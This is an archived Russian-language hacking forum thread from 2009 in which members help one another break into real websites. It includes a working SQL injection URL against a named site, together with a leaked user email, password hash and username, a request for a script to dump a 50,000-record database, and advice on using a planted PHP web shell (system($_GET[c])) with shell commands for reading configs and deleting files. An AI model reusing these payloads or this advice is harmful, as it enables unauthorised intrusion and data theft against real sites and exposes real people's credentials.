ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

12.02.2009, 20:59
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Saiga
странно!
-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.
И на все тругие тоше самое ..
Убери пробелы из урла и почитай любую статью по скулям
|
|
|

12.02.2009, 21:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2 Saiga
http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id, password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--
piney@panelmonkey.org:2:8d078be183b8a05eb74256465e 9a507ad5c825f3:TPS Pineapple
работай лимитом и всё у тебя получится
Последний раз редактировалось Gorev; 12.02.2009 в 21:03..
|
|
|

12.02.2009, 21:48
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Это,люди,вот такой код:
require "./start.php";
require $site_dir."/include/security.php";
if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
func_header_location("error_message.php?access_den ied&id=3");
}
if (isset($editor_mode))
unset($editor_mode);
x_session_register("editor_mode");
Возможна ли здесь ансет атака,даже если она ничего не даёт :Д
|
|
|

12.02.2009, 22:57
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме: 120981
Репутация:
1
|
|
Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется  Извините если попал в offtop
|
|
|

13.02.2009, 06:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))
|
|
|

13.02.2009, 09:57
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме: 170978
Репутация:
1
|
|
попугай тама magic_quotes_on  я бы залил с радастю снова  но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?
|
|
|

13.02.2009, 12:37
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
там *nix?
Если да, то почитай конфиги и где то должна быть админка, етс...
напомню:
ls (ls -lia) --листинг диры
pwd ---текущая дира
cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
rm file -- удалить файл (например мещающий хтакцесс)
этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.
|
|
|

13.02.2009, 13:55
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме: 170978
Репутация:
1
|
|
тама FreeBSD
|
|
|

13.02.2009, 13:58
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
фрибсд это никс система
|
|
|

13.02.2009, 19:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
запрос не правильно составляешь либо прав не хватает
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|